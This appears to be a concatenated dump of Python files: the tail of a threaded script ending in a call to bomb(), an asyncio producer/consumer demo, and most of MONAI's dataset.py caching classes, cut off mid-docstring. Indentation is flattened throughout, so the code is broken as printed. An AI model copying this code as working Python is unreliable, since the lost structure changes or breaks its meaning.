    t2.start()
    t1.join()
    t2.join()
bomb()
|
dynamicCoro.py
|
import asyncio
from threading import Thread
async def production_task():
i = 0
while 1:
        # Register one consumption() coroutine per iteration onto the event loop running in the worker
        # thread; thread_loop keeps accumulating endless tasks, each printing its own i forever.
        asyncio.run_coroutine_threadsafe(
            consumption(i), thread_loop
        )  # note: run_coroutine_threadsafe only works with an event loop running in another thread
        await asyncio.sleep(2)  # the await here is required
i += 1
async def consumption(i):
while True:
print("我是第{}任务".format(i))
await asyncio.sleep(1)
def start_loop(loop):
    # run the event loop; the loop is passed in as an argument
asyncio.set_event_loop(loop)
loop.run_forever()
# consumer side
thread_loop = asyncio.new_event_loop()  # create a dedicated event loop
run_loop_thread = Thread(target=start_loop, args=(thread_loop,))  # run this event loop in a thread so it does not block the main thread
run_loop_thread.start()  # start the thread; the event loop starts running inside it
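# Hedged addition (not in the original): a small helper for shutting the
# background loop down cleanly from the main thread. loop.stop() itself is not
# thread-safe, so it has to be scheduled with call_soon_threadsafe(). It is
# defined here for illustration only and is never called by this script.
def stop_background_loop():
    thread_loop.call_soon_threadsafe(thread_loop.stop)
    run_loop_thread.join()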
# producer side
advocate_loop = asyncio.get_event_loop()  # the producer coroutine is registered on this loop
advocate_loop.run_until_complete(production_task())  # run this loop
|
dataset.py
|
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import math
import pickle
import shutil
import sys
import tempfile
import threading
import time
import warnings
from copy import copy, deepcopy
from multiprocessing.pool import ThreadPool
from pathlib import Path
from typing import IO, TYPE_CHECKING, Any, Callable, Dict, List, Optional, Sequence, Union
import numpy as np
import torch
from torch.utils.data import Dataset as _TorchDataset
from torch.utils.data import Subset
from monai.data.utils import convert_tables_to_dicts, first, pickle_hashing
from monai.transforms import Compose, Randomizable, ThreadUnsafe, Transform, apply_transform
from monai.utils import MAX_SEED, ensure_tuple, get_seed, min_version, optional_import
if TYPE_CHECKING:
from tqdm import tqdm
has_tqdm = True
else:
tqdm, has_tqdm = optional_import("tqdm", "4.47.0", min_version, "tqdm")
lmdb, _ = optional_import("lmdb")
pd, _ = optional_import("pandas")
class Dataset(_TorchDataset):
"""
A generic dataset with a length property and an optional callable data transform
when fetching a data sample.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, typical input data can be a list of dictionaries::
[{ { {
'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz',
'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
"""
def __init__(self, data: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: a callable data transform on input data.
"""
self.data = data
self.transform = transform
def __len__(self) -> int:
return len(self.data)
def _transform(self, index: int):
"""
Fetch single data item from `self.data`.
"""
data_i = self.data[index]
return apply_transform(self.transform, data_i) if self.transform is not None else data_i
def __getitem__(self, index: Union[int, slice, Sequence[int]]):
"""
Returns a `Subset` if `index` is a slice or Sequence, a data item otherwise.
"""
if isinstance(index, slice):
# dataset[:42]
start, stop, step = index.indices(len(self))
indices = range(start, stop, step)
return Subset(dataset=self, indices=indices)
if isinstance(index, collections.abc.Sequence):
# dataset[[1, 3, 4]]
return Subset(dataset=self, indices=index)
return self._transform(index)
class PersistentDataset(Dataset):
"""
    Persistent storage of pre-computed values to efficiently manage larger-than-memory dictionary-format data;
    it can apply transforms to specific fields. Results from the non-random transform components are computed
    when first used, and stored in the `cache_dir` for rapid retrieval on subsequent uses.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
For example, typical input data can be a list of dictionaries::
[{ { {
'image': 'image1.nii.gz', 'image': 'image2.nii.gz', 'image': 'image3.nii.gz',
'label': 'label1.nii.gz', 'label': 'label2.nii.gz', 'label': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
For a composite transform like
.. code-block:: python
[ LoadImaged(keys=['image', 'label']),
Orientationd(keys=['image', 'label'], axcodes='RAS'),
ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),
RandCropByPosNegLabeld(keys=['image', 'label'], label_key='label', spatial_size=(96, 96, 96),
pos=1, neg=1, num_samples=4, image_key='image', image_threshold=0),
ToTensord(keys=['image', 'label'])]
Upon first use a filename based dataset will be processed by the transform for the
[LoadImaged, Orientationd, ScaleIntensityRanged] and the resulting tensor written to
    the `cache_dir` before applying the remaining random dependent transforms
[RandCropByPosNegLabeld, ToTensord] elements for use in the analysis.
Subsequent uses of a dataset directly read pre-processed results from `cache_dir`
    followed by applying the random dependent parts of transform processing.
During training call `set_data()` to update input data and recompute cache content.
Note:
        The input data must be a list of file paths, which are hashed as the cache keys.
        When loading persistent cache content, there is no guarantee that the cached data matches the
        current transform chain, so please make sure to use exactly the same non-random transforms and
        arguments as were used to build the cache; otherwise, unexpected errors may occur.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
                `PersistentDataset` expects the input data to be a list of serializable items,
                which are hashed as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.cache_dir = Path(cache_dir) if cache_dir is not None else None
self.hash_func = hash_func
if self.cache_dir is not None:
if not self.cache_dir.exists():
self.cache_dir.mkdir(parents=True, exist_ok=True)
if not self.cache_dir.is_dir():
raise ValueError("cache_dir must be a directory.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
self.data = data
if self.cache_dir is not None and self.cache_dir.exists():
shutil.rmtree(self.cache_dir, ignore_errors=True)
self.cache_dir.mkdir(parents=True, exist_ok=True)
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the first random element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the first identified
random transform object
"""
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
# this is to be consistent with CacheDataset even though it's not in a multi-thread situation.
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the first random transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first random transform)
Returns:
the transformed element through the random transforms
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
start_post_randomize_run = False
for _transform in self.transform.transforms:
if (
start_post_randomize_run
or isinstance(_transform, Randomizable)
or not isinstance(_transform, Transform)
):
start_post_randomize_run = True
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _cachecheck(self, item_transformed):
"""
A function to cache the expensive input data transform operations
so that huge data sets (larger than computer memory) can be processed
on the fly as needed, and intermediate results written to disk for
future use.
Args:
item_transformed: The current data element to be mutated into transformed representation
Returns:
The transformed data_element, either from cache, or explicitly computing it.
Warning:
The current implementation does not encode transform information as part of the
hashing mechanism used for generating cache names. If the transforms applied are
changed in any way, the objects in the cache dir will be invalid. The hash for the
            cache is ONLY dependent on the input filename paths.
"""
hashfile = None
if self.cache_dir is not None:
data_item_md5 = self.hash_func(item_transformed).decode("utf-8")
hashfile = self.cache_dir / f"{data_item_md5}.pt"
if hashfile is not None and hashfile.is_file(): # cache hit
try:
return torch.load(hashfile)
except PermissionError as e:
if sys.platform != "win32":
raise e
_item_transformed = self._pre_transform(deepcopy(item_transformed)) # keep the original hashed
if hashfile is not None:
# NOTE: Writing to a temporary directory and then using a nearly atomic rename operation
# to make the cache more robust to manual killing of parent process
# which may leave partially written cache files in an incomplete state
with tempfile.TemporaryDirectory() as tmpdirname:
temp_hash_file = Path(tmpdirname) / hashfile.name
torch.save(_item_transformed, temp_hash_file)
if temp_hash_file.is_file() and not hashfile.is_file():
# On Unix, if target exists and is a file, it will be replaced silently if the user has permission.
# for more details: https://docs.python.org/3/library/shutil.html#shutil.move.
try:
shutil.move(temp_hash_file, hashfile)
except FileExistsError:
pass
return _item_transformed
def _transform(self, index: int):
pre_random_item = self._cachecheck(self.data[index])
return self._post_transform(pre_random_item)
class CacheNTransDataset(PersistentDataset):
"""
    Extension of `PersistentDataset` that also caches the result of the first N transforms, whether or not they are random.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_n_trans: int,
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
                `PersistentDataset` expects the input data to be a list of serializable items,
                which are hashed as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_n_trans: cache the result of first N transforms.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
"""
super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func)
self.cache_n_trans = cache_n_trans
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the N element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the N transform object
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i == self.cache_n_trans:
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the N + 1 transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first N transform)
Returns:
the final transformed result
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i >= self.cache_n_trans:
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
class LMDBDataset(PersistentDataset):
"""
Extension of `PersistentDataset` using LMDB as the backend.
See Also:
:py:class:`monai.data.PersistentDataset`
Examples:
>>> items = [{"data": i} for i in range(5)]
# [{'data': 0}, {'data': 1}, {'data': 2}, {'data': 3}, {'data': 4}]
>>> lmdb_ds = monai.data.LMDBDataset(items, transform=monai.transforms.SimulateDelayd("data", delay_time=1))
>>> print(list(lmdb_ds)) # using the cached results
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Union[Path, str] = "cache",
hash_func: Callable[..., bytes] = pickle_hashing,
db_name: str = "monai_cache",
progress: bool = True,
pickle_protocol=pickle.HIGHEST_PROTOCOL,
lmdb_kwargs: Optional[dict] = None,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
                `LMDBDataset` expects the input data to be a list of serializable items,
                which are hashed as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: if specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If the cache_dir doesn't exist, will automatically create it. Defaults to "./cache".
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
db_name: lmdb database file name. Defaults to "monai_cache".
progress: whether to display a progress bar.
pickle_protocol: pickle protocol version. Defaults to pickle.HIGHEST_PROTOCOL.
https://docs.python.org/3/library/pickle.html#pickle-protocols
lmdb_kwargs: additional keyword arguments to the lmdb environment.
for more details please visit: https://lmdb.readthedocs.io/en/release/#environment-class
"""
super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func)
self.progress = progress
if not self.cache_dir:
raise ValueError("cache_dir must be specified.")
self.db_file = self.cache_dir / f"{db_name}.lmdb"
self.pickle_protocol = pickle_protocol
self.lmdb_kwargs = lmdb_kwargs or {}
if not self.lmdb_kwargs.get("map_size", 0):
self.lmdb_kwargs["map_size"] = 1024 ** 4 # default map_size
# lmdb is single-writer multi-reader by default
# the cache is created without multi-threading
self._read_env = None
# this runs on the primary thread/process
self._fill_cache_start_reader(show_progress=self.progress)
print(f"Accessing lmdb file: {self.db_file.absolute()}.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
super().set_data(data=data)
self._read_env = self._fill_cache_start_reader(show_progress=self.progress)
def _fill_cache_start_reader(self, show_progress=True):
"""
        Check the LMDB cache and write the cache if needed. py-lmdb doesn't have good support for concurrent writes.
        This method can be used with multiple processes, but it may have a negative impact on performance.
Args:
show_progress: whether to show the progress bar if possible.
"""
# create cache
self.lmdb_kwargs["readonly"] = False
env = lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
if show_progress and not has_tqdm:
warnings.warn("LMDBDataset: tqdm is not installed. not displaying the caching progress.")
with env.begin(write=False) as search_txn:
for item in tqdm(self.data) if has_tqdm and show_progress else self.data:
key = self.hash_func(item)
done, retry, val = False, 5, None
while not done and retry > 0:
try:
with search_txn.cursor() as cursor:
done = cursor.set_key(key)
if done:
continue
if val is None:
val = self._pre_transform(deepcopy(item)) # keep the original hashed
val = pickle.dumps(val, protocol=self.pickle_protocol)
with env.begin(write=True) as txn:
txn.put(key, val)
done = True
except lmdb.MapFullError:
done, retry = False, retry - 1
size = env.info()["map_size"]
new_size = size * 2
warnings.warn(
f"Resizing the cache database from {int(size) >> 20}MB" f" to {int(new_size) >> 20}MB."
)
env.set_mapsize(new_size)
except lmdb.MapResizedError:
# the mapsize is increased by another process
# set_mapsize with a size of 0 to adopt the new size
env.set_mapsize(0)
if not done: # still has the map full error
size = env.info()["map_size"]
env.close()
raise ValueError(f"LMDB map size reached, increase size above current size of {size}.")
size = env.info()["map_size"]
env.close()
# read-only database env
self.lmdb_kwargs["readonly"] = True
self.lmdb_kwargs["map_size"] = size
if self.lmdb_kwargs.get("lock", None) is None:
self.lmdb_kwargs["lock"] = False
if self.lmdb_kwargs.get("readahead", None) is None:
self.lmdb_kwargs["readahead"] = False
return lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
def _cachecheck(self, item_transformed):
"""
        If the item is not found in the LMDB file, fall back to the default `PersistentDataset` caching behaviour.
"""
if self._read_env is None:
# this runs on multiple processes, each one should have its own env.
self._read_env = self._fill_cache_start_reader(show_progress=False)
with self._read_env.begin(write=False) as txn:
data = txn.get(self.hash_func(item_transformed))
if data is None:
warnings.warn("LMDBDataset: cache key not found, running fallback caching.")
return super()._cachecheck(item_transformed)
try:
return pickle.loads(data)
except Exception as err:
raise RuntimeError("Invalid cache value, corrupted lmdb file?") from err
def info(self):
"""
Returns: dataset info dictionary.
"""
if self._read_env is None:
self._read_env = self._fill_cache_start_reader()
out = dict(self._read_env.info())
out["size"] = len(self.data)
out["filename"] = f"{self.db_file.absolute()}"
return out
class CacheDataset(Dataset):
"""
Dataset with cache mechanism that can load data and cache deterministic transforms' result during training.
By caching the results of non-random preprocessing transforms, it accelerates the training data pipeline.
If the requested data is not in the cache, all transforms will run normally
(see also :py:class:`monai.data.dataset.Dataset`).
Users can set the cache rate or number of items to cache.
It is recommended to experiment with different `cache_num` or `cache_rate` to identify the best training speed.
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
So to improve the caching efficiency, please always put as many as possible non-random transforms
before the randomized ones when composing the chain of transforms.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if the transform is a `Compose` of::
transforms = Compose([
LoadImaged(),
AddChanneld(),
Spacingd(),
Orientationd(),
ScaleIntensityRanged(),
RandCropByPosNegLabeld(),
ToTensord()
])
when `transforms` is used in a multi-epoch training pipeline, before the first training epoch,
this dataset will cache the results up to ``ScaleIntensityRanged``, as
all non-random transforms `LoadImaged`, `AddChanneld`, `Spacingd`, `Orientationd`, `ScaleIntensityRanged`
can be cached. During training, the dataset will load the cached results and run
``RandCropByPosNegLabeld`` and ``ToTensord``, as ``RandCropByPosNegLabeld`` is a randomized transform
    and its outcome is not cached.
During training call `set_data()` to update input data and recompute cache content, note that it requires
`persistent_workers=False` in the PyTorch DataLoader.
Note:
`CacheDataset` executes non-random transforms and prepares cache content in the main process before
the first epoch, then all the subprocesses of DataLoader will read the same cache content in the main process
during training. it may take a long time to prepare cache content according to the size of expected cache data.
So to debug or verify the program before real training, users can set `cache_rate=0.0` or `cache_num=0` to
temporarily skip caching.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_workers: Optional[int] = None,
progress: bool = True,
copy_cache: bool = True,
) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_workers: the number of worker processes to use.
If num_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar.
copy_cache: whether to `deepcopy` the cache content before applying the random transforms,
default to `True`. if the random transforms don't modify the cache content
or every cache item is only used once in a `multi-processing` environment,
may set `copy=False` for better performance.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.progress = progress
self.copy_cache = copy_cache
self.cache_num = min(int(cache_num), int(len(data) * cache_rate), len(data))
self.num_workers = num_workers
if self.num_workers is not None:
self.num_workers = max(int(self.num_workers), 1)
self._cache: List = self._fill_cache()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call this func after an entire epoch and must set `persistent_workers=False`
in PyTorch DataLoader, because it needs to create new worker processes based on new
generated cache content.
"""
self.data = data
self._cache = self._fill_cache()
def _fill_cache(self) -> List:
if self.cache_num <= 0:
return []
if self.progress and not has_tqdm:
warnings.warn("tqdm is not installed, will not show the caching progress bar.")
with ThreadPool(self.num_workers) as p:
if self.progress and has_tqdm:
return list(
tqdm(
p.imap(self._load_cache_item, range(self.cache_num)),
total=self.cache_num,
desc="Loading dataset",
)
)
return list(p.imap(self._load_cache_item, range(self.cache_num)))
def _load_cache_item(self, idx: int):
"""
Args:
idx: the index of the input data sequence.
"""
item = self.data[idx]
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item = apply_transform(_xform, item)
return item
def _transform(self, index: int):
if index % len(self) >= self.cache_num: # support negative index
# no cache for this index, execute all the transforms directly
return super()._transform(index)
# load data from cache and execute from the first random transform
start_run = False
if self._cache is None:
self._cache = self._fill_cache()
data = self._cache[index]
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for _transform in self.transform.transforms:
if start_run or isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
# only need to deep copy data on first non-deterministic transform
if not start_run:
start_run = True
if self.copy_cache:
data = deepcopy(data)
data = apply_transform(_transform, data)
return data
class SmartCacheDataset(Randomizable, CacheDataset):
"""
Re-implementation of the SmartCache mechanism in NVIDIA Clara-train SDK.
At any time, the cache pool only keeps a subset of the whole dataset. In each epoch, only the items
in the cache are used for training. This ensures that data needed for training is readily available,
keeping GPU resources busy. Note that cached items may still have to go through a non-deterministic
transform sequence before being fed to GPU. At the same time, another thread is preparing replacement
items by applying the transform sequence to items not in cache. Once one epoch is completed, Smart
Cache replaces the same number of items with replacement items.
Smart Cache uses a simple `running window` algorithm to determine the cache content and replacement items.
Let N be the configured number of objects in cache; and R be the number of replacement objects (R = ceil(N * r),
where r is the configured replace rate).
For more details, please refer to:
https://docs.nvidia.com/clara/tlt-mi/clara-train-sdk-v3.0/nvmidl/additional_features/smart_cache.html#smart-cache
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if we have 5 images: `[image1, image2, image3, image4, image5]`, and `cache_num=4`, `replace_rate=0.25`.
so the actual training images cached and replaced for every epoch are as below::
epoch 1: [image1, image2, image3, image4]
epoch 2: [image2, image3, image4, image5]
epoch 3: [image3, image4, image5, image1]
        epoch 4: [image4, image5, image1, image2]
epoch N: [image[N % 5] ...]
The usage of `SmartCacheDataset` contains 4 steps:
1. Initialize `SmartCacheDataset` object and cache for the first epoch.
2. Call `start()` to run replacement thread in background.
3. Call `update_cache()` before every epoch to replace training items.
4. Call `shutdown()` when training ends.
During training call `set_data()` to update input data and recompute cache content, note to call
`shutdown()` to stop first, then update data and call `start()` to restart.
Note:
This replacement will not work for below cases:
1. Set the `multiprocessing_context` of DataLoader to `spawn`.
2. Run on windows(the default multiprocessing method is `spawn`) with `num_workers` greater than 0.
3. Set the `persistent_workers` of DataLoader to `True` with `num_workers` greater than 0.
If using MONAI workflows, please add `SmartCacheHandler` to the handler list of trainer,
otherwise, please make sure to call `start()`, `update_cache()`, `shutdown()` during training.
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
replace_rate: percentage of the cached items to be replaced in every epoch.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_init_workers: the number of worker threads to initialize the cache for first epoch.
If num_init_workers is None then the number returned by os.cpu_count() is used.
num_replace_workers: the number of worker threads to prepare the replacement cache for every epoch.
If num_replace_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar when caching for the first epoch.
shuffle: whether to shuffle the whole data list before preparing the cache content for first epoch.
it will not modify the original input data sequence in-place.
seed: random seed if shuffle is `True`, default to `0`.
copy_cache: whether to `deepcopy` the cache content before applying the random transforms,
default to `True`. if the random transforms don't modify the cache content
or every cache item is only used once in a `multi-processing` environment,
may set `copy=False` for better performance.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
replace_rate: float,
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_init_workers: Optional[int] = None,
num_replace_workers: Optional[int] = None,
progress: bool = True,
shuffle: bool = True,
seed: int = 0,
copy_cache: bool = True,
) -> None:
if shuffle:
self.set_random_state(seed=seed)
data = copy(data)
self.randomize(data)
self.shuffle = shuffle
super().__init__(data, transform, cache_num, cache_rate, num_init_workers, progress, copy_cache)
if self._cache is None:
self._cache = self._fill_cache()
if self.cache_num >= len(data):
warnings.warn(
"cache_num is greater or equal than dataset length, fall back to regular monai.data.CacheDataset."
)
if replace_rate <= 0:
raise ValueError("replace_rate must be greater than 0, otherwise, please use monai.data.CacheDataset.")
self.num_replace_workers: Optional[int] = num_replace_workers
if self.num_replace_workers is not None:
self.num_replace_workers = max(int(self.num_replace_workers), 1)
self._total_num: int = len(data)
self._replace_num: int = min(math.ceil(self.cache_num * replace_rate), len(data) - self.cache_num)
self._replacements: List[Any] = [None for _ in range(self._replace_num)]
self._replace_data_idx: List[int] = list(range(self._replace_num))
self._start_pos: int = 0
self._update_lock: threading.Lock = threading.Lock()
self._round: int = 1
self._replace_done: bool = False
self._replace_mgr: Optional[threading.Thread] = None
self._compute_data_idx()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call `shutdown()` before calling this func.
"""
if self.is_started():
warnings.warn("SmartCacheDataset is not shutdown yet, shutdown it directly.")
self.shutdown()
if self.shuffle:
data = copy(data)
self.randomize(data)
super().set_data(data)
def randomize(self, data: Sequence) -> None:
try:
self.R.shuffle(data)
except TypeError as e:
warnings.warn(f"input data can't be shuffled in SmartCacheDataset with numpy.random.shuffle(): {e}.")
def _compute_data_idx(self):
"""
Update the replacement data position in the total data.
"""
for i in range(self._replace_num):
pos: int = self._start_pos + self.cache_num + i
if pos >= self._total_num:
pos -= self._total_num
self._replace_data_idx[i] = pos
def is_started(self):
"""
Check whether the replacement thread is already started.
"""
if self._replace_mgr is None:
return False
return self._replace_mgr.is_alive()
def start(self):
"""
Start the background thread to replace training items for every epoch.
"""
if self._replace_mgr is None or not self.is_started():
self._restart()
def _restart(self):
"""
Restart background thread if killed for some reason.
"""
self._round = 1
self._replace_mgr = threading.Thread(target=self.manage_replacement, daemon=True)
self._replace_mgr.start()
def _try_update_cache(self):
"""
Update the cache items with new replacement for current epoch.
"""
with self._update_lock:
if not self._replace_done:
return False
del self._cache[: self._replace_num]
self._cache.extend(self._replacements)
self._start_pos += self._replace_num
if self._start_pos >= self._total_num:
self._start_pos -= self._total_num
self._compute_data_idx()
# ready for next round
self._round += 1
self._replace_done = False
return True
def update_cache(self):
"""
Update cache items for current epoch, need to call this function before every epoch.
If the cache has been shutdown before, need to restart the `_replace_mgr` thread.
"""
if not self._replace_mgr.is_alive():
self._restart()
# make sure update is done
while not self._try_update_cache():
time.sleep(0.01)
def _try_shutdown(self):
"""
Wait for thread lock to shut down the background thread.
"""
with self._update_lock:
if self._replace_done:
self._round = 0
self._start_pos = 0
self._compute_data_idx()
self._replace_done = False
return True
return False
def shutdown(self):
"""
Shut down the background thread for replacement.
"""
if not self.is_started():
return
# wait until replace mgr is done the current round
while not self._try_shutdown():
time.sleep(0.01)
self._replace_mgr.join()
def _replace_cache_thread(self, index: int):
"""
Execute deterministic transforms on the new data for replacement.
"""
pos: int = self._replace_data_idx[index]
self._replacements[index] = self._load_cache_item(pos)
def _compute_replacements(self):
"""
Compute expected items for the replacement of next epoch, execute deterministic transforms.
It can support multi-threads to accelerate the computation progress.
"""
with ThreadPool(self.num_replace_workers) as p:
p.map(self._replace_cache_thread, list(range(self._replace_num)))
self._replace_done = True
def _try_manage_replacement(self, check_round):
"""
Wait thread lock and replace training items in the background thread.
"""
with self._update_lock:
if self._round <= 0:
# shutdown replacement
self._replace_done = True
return True, -1
if self._round != check_round:
self._compute_replacements()
return False, self._round
def manage_replacement(self):
"""
Background thread for replacement.
"""
check_round: int = -1
done = False
while not done:
done, check_round = self._try_manage_replacement(check_round)
time.sleep(0.01)
def __len__(self):
"""
The dataset length is given by cache_num instead of len(data).
"""
return self.cache_num
class ZipDataset(Dataset):
"""
    Zip several PyTorch datasets and output data (with the same index) together in a tuple.
    If the output of a single dataset is already a tuple, it is flattened and extended into the result.
    For example: if datasetA returns (img, imgmeta) and datasetB returns (seg, segmeta),
    the zipped dataset returns (img, imgmeta, seg, segmeta).
    If the datasets don't have the same length, the minimum of their lengths is used as the length
    of the ZipDataset.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Examples::
>>> zip_data = ZipDataset([[1, 2, 3], [4, 5]])
>>> print(len(zip_data))
2
>>> for item in zip_data:
>>> print(item)
[1, 4]
[2, 5]
"""
def __init__(self, datasets: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
datasets: list of datasets to zip together.
transform: a callable data transform operates on the zipped item from `datasets`.
"""
super().__init__(list(datasets), transform=transform)
def __len__(self) -> int:
return min(len(dataset) for dataset in self.data)
def _transform(self, index: int):
def to_list(x):
return list(x) if isinstance(x, (tuple, list)) else [x]
data = []
for dataset in self.data:
data.extend(to_list(dataset[index]))
if self.transform is not None:
data = apply_transform(self.transform, data, map_items=False) # transform the list data
# use tuple instead of list as the default collate_fn callback of MONAI DataLoader flattens nested lists
return tuple(data)
class ArrayDataset(Randomizable, _TorchDataset):
"""
Dataset for segmentation and classification tasks based on array format input data and transforms.
It ensures the same random seeds in the randomized transforms defined for image, segmentation and label.
The `transform` can be :py:class:`monai.transforms.Compose` or any other callable object.
For example:
If train based on Nifti format images without metadata, all transforms can be composed::
img_transform = Compose(
[
LoadImage(image_only=True),
AddChannel(),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
    If training is based on images and their metadata, the array transforms can not be composed
    because several transforms receive multiple parameters or return multiple values. Then users need
    to define their own callable method to parse metadata from `LoadImage` or set the `affine` matrix
to `Spacing` transform::
class TestCompose(Compose):
def __call__(self, input_):
